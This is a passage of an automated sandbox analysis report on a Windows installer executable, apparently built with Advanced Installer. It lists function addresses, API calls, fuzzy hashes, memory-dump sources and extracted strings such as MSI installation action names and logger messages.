Opcode Fuzzy Hash: 69af038c00a4e72578e021d1fa7d2ec48303a89892b94791ee6fd7646021ba36
Instruction Fuzzy Hash: 7F215EB0601602EFE720DF69D988BA6BBFDFB05714F104229E524C73A4DB79D904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013CE988, Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

LCMapStringEx.KERNEL32(?,013CD8EA,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 013CE9BC
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,013CD8EA,?,?,00000000,?,00000000), ref: 013CE9DA

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: f2808334a21e79a264682bcf77122cc7ad6b7508d34ff280c2255e4a59523796
Instruction ID: 3855cdcab8348e191e47c134e81312b0cbad5acd0006e565e4d15d79c44f5e7a
Opcode Fuzzy Hash: f2808334a21e79a264682bcf77122cc7ad6b7508d34ff280c2255e4a59523796
Instruction Fuzzy Hash: 0AF07A3200011ABBCF126F94DC05DDE3F26FF597A4F054124FA1825020C736D871AF94

Uniqueness

Uniqueness Score: -1.00%

Function 01311560, Relevance: 1.7, APIs: 1, Instructions: 209COMMON

Download Yara Rule

APIs

Part of subcall function 01296840: std::_Xinvalid_argument.LIBCPMT ref: 01296845

Part of subcall function 013BBD5A: EnterCriticalSection.KERNEL32(0147B82C,?,?,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBD65
Part of subcall function 013BBD5A: LeaveCriticalSection.KERNEL32(0147B82C,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBDA2

__Init_thread_footer.LIBCMT ref: 01311772

Part of subcall function 013BBD10: EnterCriticalSection.KERNEL32(0147B82C,?,?,01298887,0147C45C,01413860), ref: 013BBD1A
Part of subcall function 013BBD10: LeaveCriticalSection.KERNEL32(0147B82C,?,01298887,0147C45C,01413860), ref: 013BBD4D
Part of subcall function 013BBD10: RtlWakeAllConditionVariable.NTDLL ref: 013BBDC4

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWakeXinvalid_argumentstd::_
String ID:
API String ID: 3808766702-0
Opcode ID: 5839d660aca7fb5818255bb6755c85d827b91d731a89077f56222f187d9b5ee3
Instruction ID: 40ac4b8bcefdf14210ce32c61092a3b80683d01546d9ee600a5f7d4a0ecc15ae
Opcode Fuzzy Hash: 5839d660aca7fb5818255bb6755c85d827b91d731a89077f56222f187d9b5ee3
Instruction Fuzzy Hash: CA5116717006068BC728DF7CD8805AAB7E5FBD8214F144A3EEA56C7744EB31E919CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013D146E, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,00000104,?,00000000), ref: 013D14A0

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: d96f936b72d5e4bcb35fa25c9fde10c61fefd2ee906af15ab72796540f5ec11b
Instruction ID: f0f65efc4c1f4ed54972b189a76015de088db3765d00cc3e52730de5080d456f
Opcode Fuzzy Hash: d96f936b72d5e4bcb35fa25c9fde10c61fefd2ee906af15ab72796540f5ec11b
Instruction Fuzzy Hash: F34149B250429C9BDB218A58DD84FFB7BFEAB5570CF5804ADE58B87042D238A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013CB942, Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 013CB9F5

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ed0981605f5a3db34094e51ec429c58e101a5cc07de46e8b63a025dc2a95870f
Instruction ID: 64f822d81f56ee7a920a8060d31c2d96f976514605360d275b118e6d361ab7e7
Opcode Fuzzy Hash: ed0981605f5a3db34094e51ec429c58e101a5cc07de46e8b63a025dc2a95870f
Instruction Fuzzy Hash: AC315A76A00A109FDB14CF5DC48189DFBF2FF896247168169D619AB368D330AC01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01363E20, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,01346200,?,00000000,00000000,?,?), ref: 01363E3D

Part of subcall function 01298440: HeapAlloc.KERNEL32(?,00000000,?,2F685009,00000000,013DBBA0,000000FF,?,?,01471B74,?,0135FF88,80004005,2F685009), ref: 0129848A

Part of subcall function 01363F10: WaitForSingleObject.KERNEL32(?,000000FF,2F685009,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 01363F44

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCreateFileHeapObjectSingleWait
String ID:
API String ID: 2723504993-0
Opcode ID: 5ae31161b59f40af34116fe25af7fa6fe534a0f566959ad98959bba8b4141615
Instruction ID: dcabcac9abafa1ae194bb0fdf2e9ae879ff18d1777e39d55d6fcf6993da0fad7
Opcode Fuzzy Hash: 5ae31161b59f40af34116fe25af7fa6fe534a0f566959ad98959bba8b4141615
Instruction Fuzzy Hash: 55313575200B018FD324DF28D888B1ABBE4FF88304F20895DE69EDB364D730A950CB55

Uniqueness

Uniqueness Score: -1.00%

Function 013D1702, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 013D175F

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 25b710890f3af6082b44d8599256d521e4a3bc90edc71e9dd8719871b2b74c90
Instruction ID: bc003e8d1201477ce2288ded8dfb4ffab814c8f02bc7f2368507b95e33d509ff
Opcode Fuzzy Hash: 25b710890f3af6082b44d8599256d521e4a3bc90edc71e9dd8719871b2b74c90
Instruction Fuzzy Hash: 5D21F673D01622DFEB209F6CB480799B7A5BB04B28F16410FE924B72A0D7746941CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 01298500, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 205022a9c7943ed8c3b9f0ae1cf50d1960398d6df0219eac8f035f054aeb8a07
Instruction ID: 5c510308abe565e13f80caf115b4edfc1b310e6126f42b2e7b9e84a549392409
Opcode Fuzzy Hash: 205022a9c7943ed8c3b9f0ae1cf50d1960398d6df0219eac8f035f054aeb8a07
Instruction Fuzzy Hash: 4B014072A44648AFC715CF58E841F65BBB4FB59B10F10826EFC15C7754D736A9108B50

Uniqueness

Uniqueness Score: -1.00%

Function 0135F440, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 013BBD5A: EnterCriticalSection.KERNEL32(0147B82C,?,?,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBD65
Part of subcall function 013BBD5A: LeaveCriticalSection.KERNEL32(0147B82C,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBDA2

Part of subcall function 0135F4E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 0135F54E
Part of subcall function 0135F4E0: RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 0135F595
Part of subcall function 0135F4E0: RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 0135F5B4
Part of subcall function 0135F4E0: RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 0135F5E3
Part of subcall function 0135F4E0: RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 0135F658

__Init_thread_footer.LIBCMT ref: 0135F4B6

Part of subcall function 013BBD10: EnterCriticalSection.KERNEL32(0147B82C,?,?,01298887,0147C45C,01413860), ref: 013BBD1A
Part of subcall function 013BBD10: LeaveCriticalSection.KERNEL32(0147B82C,?,01298887,0147C45C,01413860), ref: 013BBD4D
Part of subcall function 013BBD10: RtlWakeAllConditionVariable.NTDLL ref: 013BBDC4

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalQuerySectionValue$EnterLeave$ConditionInit_thread_footerOpenVariableWake
String ID:
API String ID: 3563064969-0
Opcode ID: ad7f54b50159933a98ca0ab9f3710a9faf6e62d170c92ed5dbd85635f903ac87
Instruction ID: c4723dedfa676d8049f4056fb76c3235eb9ec49391c0bd995fc10698a594d690
Opcode Fuzzy Hash: ad7f54b50159933a98ca0ab9f3710a9faf6e62d170c92ed5dbd85635f903ac87
Instruction Fuzzy Hash: EB0126B2A0060ADFD730EF5CD981F8DB7A4E704B28F20432AED2597BD4DB3569008B42

Uniqueness

Uniqueness Score: -1.00%

Function 013CC4F2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,013CD741,?,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC524

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6a3222a5f3f206bd512838da2f8c2be89079a89cb4b0b07d0a41c1a8108e128b
Instruction ID: 33c556793dc107a0d1667582cacf85c5b183740f818e88f43e016118a1ea8dba
Opcode Fuzzy Hash: 6a3222a5f3f206bd512838da2f8c2be89079a89cb4b0b07d0a41c1a8108e128b
Instruction Fuzzy Hash: BDE0E571510725D7EB3126AFBC04B5A3E4C9BA1EF8F091028AD0D96190EB20DC0183E1

Uniqueness

Uniqueness Score: -1.00%

Function 013C32DA, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 013C32ED

Part of subcall function 013CC4B8: RtlFreeHeap.NTDLL(00000000,00000000,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4CE
Part of subcall function 013CC4B8: GetLastError.KERNEL32(?,?,013CD752,?,00000004,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC4E0

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: b3e493257ccf7ec8bdf712076bbfe9ddb7506045913455d1960a65a6106a06b7
Instruction ID: 8e30bfa6a2a39d44f80d36f9b69232548af099fe8ea9a0dac67bb3d829d44c61
Opcode Fuzzy Hash: b3e493257ccf7ec8bdf712076bbfe9ddb7506045913455d1960a65a6106a06b7
Instruction Fuzzy Hash: 9FC08C3100020CBBCB01AB45C806A4EBBA8DB80268F608048E80427240CAB1EE009690

Uniqueness

Uniqueness Score: -1.00%

Function 012967C0, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?), ref: 012967CB

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 16988b81657e3058f7505ba021eb094c9d46e4429fd108185406c341fc099c23
Instruction ID: 76d67ee6d361779de76fce8ae11066a46ff367b1b37e4c94a28e69960e4638b4
Opcode Fuzzy Hash: 16988b81657e3058f7505ba021eb094c9d46e4429fd108185406c341fc099c23
Instruction Fuzzy Hash: 27C08C7020022047DB304A1CB5087823ADC9F04600F014809A509C7A40C670D8008794

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01292080, Relevance: 170.0, Strings: 134, Instructions: 2486COMMON

Download Yara Rule

Strings

MsiPublishAssemblies, xrefs: 0129486F
MIME, xrefs: 0129370B, 012940D0
1500000, xrefs: 0129466A
UnregisterFonts, xrefs: 012933C1
CostFinalize, xrefs: 0129281C
FileSize, xrefs: 01293CFE
Feature, xrefs: 01292FB7, 01294912
500, xrefs: 01294FF9
MsiUnpublishAssemblies, xrefs: 01292DC2
AI_ChainProductsPseudo, xrefs: 012952E6
Feature_, xrefs: 01292E60, 01293612, 01293FE7, 012948A6, 01294A9C, 01294B22, 01294BA8, 01294C2E
InstallServices, xrefs: 01294657
RegisterTypeLibraries, xrefs: 012944CE
~, xrefs: 01294BD9
Complus, xrefs: 01293149, 012945F7
CreateFolders, xrefs: 01293B92
File, xrefs: 012926D8, 01293A2F, 01293CBF
5000, xrefs: 01293E43
Component_, xrefs: 01292F44, 01293050, 012930E5, 0129315C, 01293268, 012932EE, 01293388, 01293480, 01293506, 012937A4, 0129382A, 012938B0, 01293936, 012939BC, 01293A42, 01293B45, 01293BCB, 01293C51, 01293CD7, 01293DE3, 01293EE6, 01294166, 012941EC, 01294272, 01294375, 012943FB, 01294486, 01294507, 0129460A, 01294690, 01294725, 0129479C, 01294822
AI_XmlInstall, xrefs: 01294C7B, 01294CF8
ProcessComponents, xrefs: 01292BE0
TypeLib, xrefs: 012944F4
10000, xrefs: 012947FC, 012953F3
1800, xrefs: 01294C8E, 012951ED
WriteRegistryValues, xrefs: 0129412D
2000, xrefs: 012922C5, 01294D88, 01294E05, 01294E82, 01294EFF, 01295076, 012950F3, 01295170
Patch, xrefs: 01293D4A
CreateShortcuts, xrefs: 01293EAD
UnregisterMIMEInfo, xrefs: 012936E5
SelfUnregModules, xrefs: 012931A9
UnregisterProgIdInfo, xrefs: 0129365F
Options, xrefs: 01294BCF, 01294C50
AI_GxUninstall, xrefs: 01294F69
InstallValidate, xrefs: 012929FE
RemoveFiles, xrefs: 01293A09, 01293A8F
AI_UninstallTasks, xrefs: 01294EEC
RemoveODBC, xrefs: 0129322F, 012932B5, 0129333B
30000, xrefs: 01292E11, 012941C6, 01294882
InstallFinalize, xrefs: 012949E6
RegisterComPlus, xrefs: 012945CC
UnpublishFeatures, xrefs: 01292F8C
AI_InstallPrerequisite, xrefs: 01294B6F
CostInitialize, xrefs: 0129246D
Extension, xrefs: 012935FF, 01293FD6
AI_ScheduledTasks, xrefs: 01295183
CreateFolder, xrefs: 01293B32, 01293BB8
15000, xrefs: 0129302A, 012930B0, 01293C2B, 01293DBD, 01293FC3, 012946F0, 012948FF
Registry, xrefs: 0129346D, 01294153
MoveFile, xrefs: 01293C3E
RegisterMIMEInfo, xrefs: 012940AA
UnregisterClassInfo, xrefs: 01293553
RemoveShortcuts, xrefs: 01293877
AI_UserGroups, xrefs: 01294E95, 01295089
AI_PreRequisite, xrefs: 01294A89, 01294B0F, 01294B95, 01294C1B
BindImage, xrefs: 01293E30, 01293E56
UnregisterExtensionInfo, xrefs: 012935D9
RemoveIniFile, xrefs: 01293791
AI_CountRowAction, xrefs: 01295363
MsiAssembly, xrefs: 01294895
PublishFeatures, xrefs: 012948EC
Shortcut, xrefs: 0129389D, 01293ED3
AppId, xrefs: 01293579, 01293F59
RegisterFonts, xrefs: 012942BF
AI_GxInstall, xrefs: 01294D75
RegisterProgIdInfo, xrefs: 0129402D
AI_ExtractPrereq, xrefs: 01294AE9
MsiConfigureServices, xrefs: 012946DD, 01294703
AI_DefaultActionCost, xrefs: 012953E0
RegisterClassInfo, xrefs: 01293F33
Font, xrefs: 012933E7, 012942E5
ODBCDriver, xrefs: 01293361, 0129446E
RemoveFile, xrefs: 01293AB5
200000, xrefs: 0129497C
Environment, xrefs: 01293923, 0129425F
8000, xrefs: 012931BC, 012933D4, 012942D2, 01294567
StartServices, xrefs: 01294763
AI_XmlElement, xrefs: 01294CA1, 01295200
RemoveIniValues, xrefs: 0129376B, 012937F1
RemoveFolders, xrefs: 01293B0C
3000, xrefs: 01292C2F, 01292F1E, 01292FA4, 01293136, 0129345A, 012934E0, 01293566, 012935EC, 01293672, 012936F8, 01293910, 01293F46, 012940BD, 012944E1, 012945E4
DuplicateFiles, xrefs: 01293DAA
AI_InstallPostPrerequisite, xrefs: 01294BF5
WriteEnvironmentStrings, xrefs: 01294239
Location, xrefs: 01294AC3, 01294B49
IniFile, xrefs: 01293817, 012941D9
AppSearch, xrefs: 0129228B, 01292314
ServiceInstall, xrefs: 0129467D
AI_ProcessGroups, xrefs: 01295063
AI_XmlUninstall, xrefs: 012951DA, 01295260
UnregisterComPlus, xrefs: 01293123
AI_UninstallGroups, xrefs: 01294E6F
UnpublishComponents, xrefs: 01292F0B
ServiceControl, xrefs: 0129303D, 012930C3, 01294789
AI_ProcessTasks, xrefs: 0129515D
InstallInitialize, xrefs: 01294969
100000, xrefs: 012949F9
AI_DownloadPrereq, xrefs: 01294A63
InstallFiles, xrefs: 01293C9E
PublishComponents, xrefs: 012947E9
6000, xrefs: 01294140
RemoveRegistry, xrefs: 012934F3
ProgId, xrefs: 01293685, 01294053
AI_UninstallAccounts, xrefs: 01294DF2
1500, xrefs: 01293779, 01293804, 01294D0B, 01295273
InstallODBC, xrefs: 0129433C, 012943C2, 01294448
Component, xrefs: 012924F6, 012928BA, 01292A9C, 01292C7E
100, xrefs: 01293D37, 01294040, 01294F7C
SelfReg, xrefs: 012931CF, 0129457A
AI_ProcessAccounts, xrefs: 012950E0
20000, xrefs: 01294776
RemoveDuplicateFiles, xrefs: 01293983
StopServices, xrefs: 01293017, 0129309D
RegisterExtensionInfo, xrefs: 01293FB0
RemoveExistingProducts, xrefs: 012920A4
AI_Game, xrefs: 01294D9B, 01294F8F
PatchFiles, xrefs: 01293D24
DuplicateFile, xrefs: 012939A9, 01293DD0
AI_XmlAttribute, xrefs: 01294D1E, 01295281
800, xrefs: 01292A4D
RemoveRegistryValues, xrefs: 01293447, 012934CD
RemoveEnvironmentStrings, xrefs: 012938FD
120000, xrefs: 0129388A
PatchSize, xrefs: 01293D84
3000000, xrefs: 0129424C
ODBCTranslator, xrefs: 012932DB, 012943E8
SelfRegModules, xrefs: 01294554
WriteIniValues, xrefs: 012941B3
AI_AppSearchEx, xrefs: 01294FE6, 0129500C
MoveFiles, xrefs: 01293C18
12000, xrefs: 01293242, 012932C8, 0129334E, 01293996, 01293A1C, 01293AA2, 01293B1F, 01293BA5, 01293EC0, 0129434F, 012943D5, 0129445B
FileCost, xrefs: 01292654
ODBCDataSource, xrefs: 01293255, 01294362
PublishComponent, xrefs: 01292F31, 0129480F
AI_UserAccounts, xrefs: 01294E18, 01295106

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 100$10000$100000$12000$120000$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$800$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppSearch$BindImage$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileCost$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
API String ID: 0-2910470256
Opcode ID: c8247c7a83b4e03eae8b34a2c116b2e385bc8ae413e76b05ec71309ec540113f
Instruction ID: 731a2aec95ed28acdda4b6551793252c14907a98412b6793606f3b5110dc37ae
Opcode Fuzzy Hash: c8247c7a83b4e03eae8b34a2c116b2e385bc8ae413e76b05ec71309ec540113f
Instruction Fuzzy Hash: 7D330C60655386E9EB21E7BCC91C7EE7BD16B61215F60468EE1E12F3F0CBB41A04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0135BAD0, Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 514fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(0147C654,C0000000,00000003,00000000,00000004,00000080,00000000,2F685009,0147C630,0147C648,?), ref: 0135BB47
GetLastError.KERNEL32 ref: 0135BB64
OutputDebugStringW.KERNEL32(00000000,00000020), ref: 0135BBDF
OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 0135BCDB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 0135BD4C
WriteFile.KERNEL32(00000000,0147C478,00000000,00000000,00000000,?,0000001C), ref: 0135BD7C
WriteFile.KERNEL32(00000000,000000FF,?,00000000,00000000,01422990,00000002), ref: 0135BE27
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 0135BE30
FlushFileBuffers.KERNEL32(00000000,?,0000001C), ref: 0135BD81

Part of subcall function 01297CC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000001,?,012A4AC0,-00000010,?,012A888D,*.*), ref: 01297CE7

OutputDebugStringW.KERNEL32(00000000,?,0000001D), ref: 0135BF22
WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000,?,0000001D), ref: 0135BFA8
FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 0135BFB3
WriteFile.KERNEL32(00000000,000000FF,?,00000000,00000000,01422990,00000002,?,?,CPU: ,00000005), ref: 0135C027
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 0135C030
WriteFile.KERNEL32(00000000,000000FF,?,00000000,00000000,01422990,00000002), ref: 0135C0B5
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 0135C0BE

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

Strings

LOGGER->Creating LOG file at:, xrefs: 0135BECA, 0135BEDC, 0135BEE6
x86, xrefs: 0135BDB8
LOGGER->Reusing LOG file at:, xrefs: 0135BC83, 0135BC95, 0135BC9F
CPU: , xrefs: 0135BE78, 0135BE8E, 0135BFBC
LOGGER->failed to create LOG at:, xrefs: 0135BB9A, 0135BBAC, 0135BBB6
x64, xrefs: 0135BDC1, 0135BDCD
server, xrefs: 0135BDD3, 0135BDDB
OS Version: %u.%u.%u SP%u (%s) [%s], xrefs: 0135BDF7
workstation, xrefs: 0135BDCE

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushWrite$DebugOutputString$Init_thread_footer$CreateErrorFindHeapLastPointerProcessResource
String ID: CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
API String ID: 4051163352-1312762833
Opcode ID: 420145884e9f4537df1a50df675594131814114b3b8fb1bd6607a44f534714f3
Instruction ID: d9b84e5ff4fb7d12c5f70406ab80991c996386356b0c748c124e4efb5102d384
Opcode Fuzzy Hash: 420145884e9f4537df1a50df675594131814114b3b8fb1bd6607a44f534714f3
Instruction Fuzzy Hash: BC129E70A0160A9FEB50DF68CC48FAEBBB9FF45318F148259E815EB2A5DB70D944CB50

Uniqueness

